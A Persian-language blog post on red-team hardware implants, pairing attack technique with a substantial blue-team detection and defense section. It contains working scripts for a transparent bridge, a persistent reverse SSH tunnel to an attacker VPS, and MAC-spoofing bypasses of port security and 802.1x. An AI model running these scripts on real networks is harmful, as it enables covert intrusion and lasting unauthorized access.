VulnCity

جاسوس در جعبه کوچک؛ فرآیند Hardware Initial Access

نویسنده: یاسین عابدینی · دسته: RedTeam · تاریخ انتشار: ۱۴۰۵/۲/۲۶

چرا Hardware Initial Access؟

در فرآیند Red Team، بعضی مواقع با موانعی مواجه می‌شویم که راه‌های سنتی نفوذ (مانند Phishing، Exploitation از طریق اینترنت، یا Social Engineering) کارساز نیستند. در این شرایط به در بسته می‌خوریم:

  • Perimeter Security قوی: Firewall‌ها، IPS/IDS، و Web Application Firewall‌های پیشرفته که تمام ترافیک ورودی را فیلتر می‌کنند
  • Air-Gapped Networks: شبکه‌هایی که به‌طور کامل از اینترنت جدا هستند (مانند شبکه‌های صنعتی، SCADA، یا شبکه‌های حساس دولتی)
  • Zero Trust Architecture: معماری‌هایی که هیچ دسترسی پیش‌فرضی به منابع داخلی ندارند
  • Email Security و Endpoint Protection پیشرفته: سیستم‌هایی که تمام فایل‌ها و لینک‌ها را در Sandbox بررسی می‌کنند
  • User Awareness بالا: کارکنانی که آموزش‌های امنیتی دیده‌اند و به‌راحتی فریب نمی‌خورند

در چنین سناریوهایی، Hardware Initial Access تنها راه ادامه فرآیند Red Team است. با دسترسی فیزیکی به محیط هدف (مثلاً از طریق Tailgating، Social Engineering فیزیکی، یا Insider Access)، می‌توانیم:

  • Bypass کردن تمام لایه‌های Perimeter Security - چون مستقیماً داخل شبکه قرار می‌گیریم
  • دسترسی به شبکه‌های Internal که از بیرون قابل دسترسی نیستند
  • Persistence ایجاد کنیم حتی اگر تمام راه‌های Remote Access مسدود شوند
  • Lateral Movement را از داخل شبکه شروع کنیم

بنابراین Hardware Initial Access یک fallback strategy و در برخی موارد تنها گزینه موجود برای ادامه عملیات Red Team است.

Hardware Additions

در این بخش به بررسی روش‌های مختلف نفوذ فیزیکی به شبکه‌های هدف از طریق نصب تجهیزات سخت‌افزاری می‌پردازیم.

Direct Access Hardware Nodes

این دسته از تجهیزات به‌صورت مستقیم به شبکه متصل شده و امکان دسترسی از راه دور را برای مهاجم فراهم می‌کنند:

1. Mikrotik-based Node (Mikrotik mAP lite)

استفاده از دستگاه‌های Mikrotik به دلیل اندازه کوچک، قابلیت اجرای script‌ها و پشتیبانی از VPN، یکی از گزینه‌های محبوب برای ایجاد backdoor در شبکه‌های هدف است.

مزایا:

  • اندازه بسیار کوچک (قابل مخفی کردن در فضاهای محدود)
  • پشتیبانی از OpenVPN، WireGuard، L2TP
  • قابلیت اجرای script‌های RouterOS
  • مصرف برق پایین (قابل تغذیه از PoE)
  • قیمت مناسب

روش‌های ارتباط با بیرون:

  • Ethernet: اتصال مستقیم به شبکه سازمان
  • WiFi: اتصال به شبکه‌های بی‌سیم مجاور (WiFi Hotspot، شبکه‌های عمومی)
  • LTE USB Modem: استفاده از مودم‌های USB LTE برای ارتباط مستقل از شبکه سازمان

2. Raspberry Pi Zero Node

این دستگاه کوچک و کم‌مصرف یکی از پرکاربردترین ابزارها برای نفوذ فیزیکی است.

مراحل راه‌اندازی:

  1. Put SD Card
  2. Download Linux From Raspberry Zero
  3. Write On SD
  4. Put On Raspberry
  5. Install Ethernet Port

روش‌های ارتباط با بیرون:

  • Ethernet: اتصال به شبکه داخلی
  • WiFi: استفاده از WiFi dongle یا ماژول داخلی (در مدل‌های W)
  • LTE/4G: استفاده از USB LTE modem یا ماژول‌های SIM800/SIM7600 برای ارتباط مستقل
  • LoRa: برای ارتباطات long-range با مصرف برق کم

نکته امنیتی: استفاده از LTE به دستگاه اجازه می‌دهد حتی در شبکه‌های Air-Gapped نیز با مهاجم در ارتباط باشد، زیرا کانال ارتباطی مستقل از شبکه سازمان است.

3. Custom Board Node

طراحی و ساخت board‌های اختصاصی با استفاده از microcontroller‌ها یا SoC‌های کوچک برای سناریوهای خاص.

پلتفرم‌های رایج:

  • ESP32: WiFi/Bluetooth built-in، قیمت بسیار پایین
  • Arduino: برای کارهای ساده و automation
  • Orange Pi Zero: جایگزین ارزان‌تر Raspberry Pi
  • GL.iNet routers: router‌های کوچک با OpenWrt

In-line Placement Devices

این دستگاه‌ها بین دو نقطه شبکه (مثلاً بین switch و کامپیوتر قربانی) قرار می‌گیرند و traffic را به‌صورت transparent عبور داده و در عین حال امکان monitoring و manipulation آن را فراهم می‌کنند.

پیکربندی transparent bridge در Linux:

SWINT=eth0 # interface متصل به switch
CLINT=eth1 # interface متصل به client
BRINT=br0  # bridge interface

# ایجاد bridge
brctl addbr $BRINT
brctl addif $BRINT $SWINT $CLINT

# فعال‌سازی promiscuous mode برای عبور transparent traffic
ifconfig $SWINT 0.0.0.0 up promisc
ifconfig $CLINT 0.0.0.0 up promisc
ifconfig $BRINT 0.0.0.0 up promisc

این پیکربندی باعث می‌شود دستگاه به‌صورت کاملاً transparent در مسیر traffic قرار گیرد و از دید شبکه قابل تشخیص نباشد.

Point: backHome Scenario

یکی از تکنیک‌های رایج برای حفظ دسترسی به دستگاه نفوذ شده، استفاده از Reverse SSH Tunnel است که به مهاجم اجازه می‌دهد از طریق یک VPS واسط به دستگاه قربانی دسترسی داشته باشد.

On Victim:

#!/bin/sh

while true; do
  ssh -NC -o ServerAliveInterval=5 \
    -o UserKnownHostsFile=/dev/null \
    -o StrictHostKeyChecking=no \
    -R '*:5353:127.0.0.1:22' AttackerUsername@VpsIp
  sleep 5
done

توضیح parameter‌ها:

  • -C: compression - فشرده‌سازی داده‌ها
  • -N: no remote command - فقط port forwarding
  • -o ServerAliveInterval=5: ارسال packet هر 5 ثانیه برای حفظ connection
  • -o UserKnownHostsFile=/dev/null: عدم ذخیره fingerprint
  • -o StrictHostKeyChecking=no: عدم بررسی هویت server
  • -R '*:5353:127.0.0.1:22': remote port forwarding - پورت 5353 روی VPS به پورت 22 local

On Attacker:

# تولید SSH key
ssh-keygen -t ed25519 -f ~/.ssh/id_backhome -N ""

# کپی public key به authorized_keys قربانی
cat ~/.ssh/id_backhome.pub

# اتصال به قربانی از طریق tunnel
ssh -i ~/.ssh/id_backhome -p 5353 VictimUsername@localhost

Protected Network Bypass

راهکارهایی برای دور زدن شبکه‌های امن شده

NAC (Network Access Control)

NAC یک راهکار امنیتی است که policy‌های دسترسی را در لایه شبکه enforce می‌کند:

Layer 2 Protection:

  • MAC Filtering
  • OUI Restriction
  • 802.1x Authentication
  • TCP Fingerprint
  • NAC Policy
  • NAT/SNAT in Layer 2

برای bypass کردن Port Security، می‌توان از ebtables یا OPNsense استفاده کرد:

# تغییر source MAC address با ebtables
ebtables -t nat -A POSTROUTING -o eth0 -j snat --to-src dc:a6:32:df:89:9e

Port Security Bypass - اسکریپت کامل:

#!/bin/bash

SWINT=eth0
CLINT=eth1
BRINT=br0

# تغییر MAC address interface متصل به switch
ifconfig $SWINT down
macchanger --mac=dc:a6:32:df:89:9e eth0
sleep 3

# راه‌اندازی bridge
ifconfig $SWINT up
brctl addbr $BRINT
brctl addif $BRINT $SWINT $CLINT
ip link set dev $BRINT up

# فعال‌سازی promiscuous mode
ifconfig $SWINT 0.0.0.0 up promisc
ifconfig $CLINT 0.0.0.0 up promisc
ifconfig $BRINT 0.0.0.0 up promisc

# اعمال SNAT برای spoofing MAC address
ebtables -t nat -A POSTROUTING -o eth0 -j snat --to-src dc:a6:32:df:89:9e

# block کردن MAC واقعی دستگاه مهاجم
ebtables -I OUTPUT -s 00:b5:6d:02:a9:63 -o eth0 -j DROP

یافتن MAC Address قربانی:

tshark -i en0 -T fields -e eth.src

دور زدن مکانیزم 802.1x

پروتکل 802.1x برای authentication در Layer 2 استفاده می‌شود. زمانی که authentication موفق نباشد، port در حالت Orange قرار می‌گیرد و فقط EAP packet‌ها اجازه عبور دارند.

روش Bypass:

  • استفاده از Switch Base MAC + SNAT

یافتن Switch Base MAC:

  • از EAP Packet
  • دستور show ver روی switch

نکته: Switch Base MAC برای تمام port‌ها trusted است.

اسکریپت 802.1x Bypass:

#!/bin/bash

SWINT=eth0
CLINT=eth1
BRINT=br0

# تنظیم MAC به Switch Base MAC
ifconfig $SWINT down
macchanger --mac=00:11:22:33:44:55 eth0 # switch base mac address
sleep 3

ifconfig $SWINT up
brctl addbr $BRINT
brctl addif $BRINT $SWINT $CLINT
ip link set dev $BRINT up

ifconfig $SWINT 0.0.0.0 up promisc
ifconfig $CLINT 0.0.0.0 up promisc
ifconfig $BRINT 0.0.0.0 up promisc

# SNAT به Switch Base MAC
ebtables -t nat -A POSTROUTING -o eth0 -j snat --to-src 00:11:22:33:44:55

ebtables -I OUTPUT -s 00:b5:6d:02:a9:63 -o eth0 -j DROP

محدودیت: DAI (Dynamic ARP Inspection) می‌تواند مانع این روش شود.

Sample (ابزارهای تجاری)

  • PACKET SQUIRREL MARK II: دستگاه کوچک multi-payload برای man-in-the-middle و packet capture
  • Shark Jack: ابزار portable برای network reconnaissance و payload injection
  • LAN Tap Pro: دستگاه passive monitoring برای capture کردن traffic بدون تداخل
  • CC1101 Module: ماژول RF برای ارتباطات sub-GHz

این ابزارها با قابلیت‌های pre-configured و interface ساده، کار Red Team را تسهیل می‌کنند.

Detection: چگونه سازمان‌ها می‌توانند دستگاه‌های مخرب را شناسایی کنند؟

شناسایی دستگاه‌های سخت‌افزاری مخرب یکی از چالش‌های اصلی تیم‌های Blue Team است. در اینجا روش‌های مختلف detection را بررسی می‌کنیم:

1. Network-Based Detection

NAC (Network Access Control) Solutions

سیستم‌های NAC می‌توانند دستگاه‌های ناشناخته را شناسایی کنند:

  • MAC Address Whitelisting: فقط MAC address‌های مجاز اجازه اتصال دارند
  • Device Profiling: شناسایی دستگاه بر اساس fingerprint (DHCP options، TCP/IP stack، User-Agent)
  • 802.1x Authentication: الزام به authentication قبل از دسترسی به شبکه
  • Anomaly Detection: شناسایی رفتارهای غیرعادی (traffic pattern، protocol usage)

Network Monitoring و SIEM

  • New Device Alerts: هشدار برای هر دستگاه جدید متصل به شبکه
  • Traffic Analysis: شناسایی ترافیک مشکوک (SSH tunnels، VPN connections، unusual protocols)
  • Baseline Deviation: مقایسه با baseline طبیعی شبکه
  • Geolocation Anomalies: شناسایی اتصالات به IP‌های خارج از کشور یا مشکوک

Port Security و Switch Configuration

! محدود کردن تعداد MAC address در هر port
switchport port-security maximum 2
switchport port-security violation shutdown
switchport port-security mac-address sticky

! فعال‌سازی DHCP Snooping
ip dhcp snooping
ip dhcp snooping vlan 10,20,30

! فعال‌سازی Dynamic ARP Inspection
ip arp inspection vlan 10,20,30
ip arp inspection validate src-mac dst-mac ip

2. Physical Security Measures

Regular Physical Audits

  • Network Port Inspection: بررسی منظم تمام port‌های شبکه برای دستگاه‌های ناشناخته
  • Cable Management: استفاده از cable با رنگ‌های مشخص و label گذاری
  • Port Blocking: مسدود کردن فیزیکی port‌های استفاده نشده با RJ45 lock
  • Equipment Inventory: نگهداری فهرست دقیق از تمام تجهیزات شبکه با serial number

Access Control

  • Badge Systems: کنترل دسترسی فیزیکی به اتاق‌های server و network closet
  • CCTV Monitoring: نصب دوربین در نقاط حساس
  • Visitor Management: نظارت دقیق بر بازدیدکنندگان و پیمانکاران
  • Clean Desk Policy: جلوگیری از دسترسی آسان به port‌های شبکه

3. Wireless Detection

Rogue Device Detection

بسیاری از دستگاه‌های implant از LTE، WiFi یا سایر تکنولوژی‌های wireless برای ارتباط استفاده می‌کنند:

  • Wireless IDS/IPS: شناسایی access point‌های غیرمجاز
  • RF Scanning: اسکن منظم طیف رادیویی برای سیگنال‌های مشکوک
  • Cellular Detection: استفاده از ابزارهایی مانند Cell Phone Detectors یا IMSI Catchers برای شناسایی دستگاه‌های LTE
  • Spectrum Analyzers: تحلیل طیف فرکانسی برای یافتن transmitter‌های مخفی

ابزارهای تخصصی:

  • Kismet: wireless network detector
  • Aircrack-ng suite: برای شناسایی و تحلیل شبکه‌های بی‌سیم
  • WiFi Pineapple Detector: شناسایی rogue access point‌ها
  • HackRF / RTL-SDR: برای RF spectrum analysis

4. Endpoint Detection

Host-Based Monitoring

  • USB Device Control: محدود کردن دستگاه‌های USB مجاز
  • Ethernet Adapter Detection: شناسایی adapter‌های جدید (مثلاً USB-to-Ethernet)
  • Network Interface Monitoring: هشدار برای فعال شدن interface‌های جدید
  • ARP Table Monitoring: شناسایی تغییرات غیرعادی در ARP table

5. Behavioral Analysis

Indicators of Compromise (IoCs)

رفتارهای مشکوک که می‌توانند نشان‌دهنده وجود implant باشند:

  • Persistent Outbound Connections: اتصالات مداوم به IP‌های خارجی (VPS، cloud providers)
  • Reverse SSH Tunnels: traffic pattern مشابه SSH با connection‌های long-lived
  • Unusual Protocols: استفاده از پروتکل‌های غیرمعمول (GRE، IPsec، custom protocols)
  • Beaconing Behavior: ارتباطات منظم با interval ثابت (مثلاً هر 5 دقیقه)
  • Data Exfiltration Patterns: انتقال حجم زیاد داده به بیرون
  • DNS Tunneling: query‌های DNS غیرعادی با payload

Network Flow Analysis

# استفاده از NetFlow/sFlow برای شناسایی pattern‌های مشکوک
# مثال: یافتن connection‌های long-lived
nfdump -R /var/log/netflow -o extended | \
awk '$10 > 3600 {print}' | \
sort -k 10 -rn

6. Advanced Detection Techniques

Power Consumption Analysis

در محیط‌های بسیار حساس، می‌توان از تحلیل مصرف برق برای شناسایی دستگاه‌های اضافی استفاده کرد:

  • نصب Power Monitoring روی هر rack
  • مقایسه مصرف برق با baseline
  • شناسایی افزایش غیرمنتظره مصرف

Thermal Imaging

  • استفاده از دوربین‌های حرارتی برای یافتن دستگاه‌های مخفی
  • شناسایی heat signature غیرعادی در دیوارها، سقف، یا کف

Time-Domain Reflectometry (TDR)

  • تست کابل‌ها برای شناسایی دستگاه
  • اندازه‌گیری impedance و یافتن anomaly در مسیر کابل

Physical Concealment

  • استفاده از enclosure‌های شبیه تجهیزات legitimate
  • نصب در مکان‌های دور از دسترس (پشت rack، زیر کف کاذب)
  • استفاده از دستگاه‌های بسیار کوچک (Raspberry Pi Zero، ESP32)
  • Integration با تجهیزات موجود (مثلاً داخل یک UPS یا PDU)

.5 Defense in Depth Strategy

بهترین رویکرد برای مقابله با Hardware Initial Access، استفاده از چندین لایه دفاعی است:

  1. Prevention: جلوگیری از نصب (physical security، access control)
  2. Detection: شناسایی سریع در صورت نصب (NAC، monitoring، audits)
  3. Response: واکنش فوری و مؤثر (isolation، forensics، removal)
  4. Recovery: بازگردانی به حالت امن (credential rotation، network reconfiguration)

Checklist برای سازمان‌ها

لایه دفاعی اقدامات وضعیت پیاده‌سازی
Prevention کنترل دسترسی فیزیکی به اتاق‌های server و network closet
مسدودسازی port‌های استفاده نشده با RJ45 lock
پیاده‌سازی visitor management و escort policy
آموزش کارکنان درباره تهدیدات فیزیکی
نصب دوربین‌های CCTV در نقاط حساس
پیاده‌سازی clean desk policy
Detection پیاده‌سازی NAC با MAC whitelisting
فعال‌سازی 802.1x authentication
پیکربندی port security روی switch‌ها
فعال‌سازی DHCP snooping و DAI
راه‌اندازی network monitoring و SIEM
پیاده‌سازی wireless IDS/IPS
انجام physical audit منظم (ماهانه/فصلی)
نگهداری inventory دقیق از تجهیزات
Response تعریف incident response plan برای hardware implant
پیاده‌سازی auto-quarantine برای دستگاه‌های مشکوک
آماده‌سازی forensic toolkit (packet capture، memory dump)
Recovery credential rotation برای حساب‌های در معرض خطر
بررسی و به‌روزرسانی firewall rules
تحلیل logs برای شناسایی lateral movement
بازبینی و تقویت physical security controls
انجام lessons learned session و به‌روزرسانی policy‌ها

نکات کلیدی برای تیم‌های Blue

  1. هیچ لایه دفاعی به تنهایی کافی نیست: ترکیب physical security، network controls، و monitoring ضروری است
  2. Visibility اولویت اول است: نمی‌توانید چیزی را که نمی‌بینید محافظت کنید - پوشش کامل monitoring حیاتی است
  3. Baseline شناخته شده داشته باشید: برای شناسایی anomaly، باید رفتار normal شبکه را بشناسید
  4. Physical security را دست کم نگیرید: بهترین firewall دنیا نمی‌تواند از یک دستگاه فیزیکی داخل شبکه جلوگیری کند
  5. آموزش مداوم: کارکنان باید بدانند چه چیزی مشکوک است و چگونه گزارش دهند
  6. تست منظم: انجام red team exercise‌های فیزیکی برای ارزیابی کنترل‌ها
  7. Response plan آماده: زمان واکنش در این سناریوها بسیار حیاتی است

جمع‌بندی

Hardware Initial Access یک تهدید واقعی و جدی است که نیاز به رویکرد جامع دارد. سازمان‌ها باید:

  • Physical security را به اندازه cyber security جدی بگیرند
  • چندین لایه دفاعی پیاده‌سازی کنند
  • Visibility کامل از شبکه داشته باشند
  • به‌طور مداوم کنترل‌های خود را تست و بهبود دهند
  • در صورت یک ضعف کوچک در BlueTeam در این تکنیک دست برنده با RedTeam با مهاجم هست

به یاد داشته باشید: امنیت یک فرآیند مداوم است، نه یک محصول یکباره.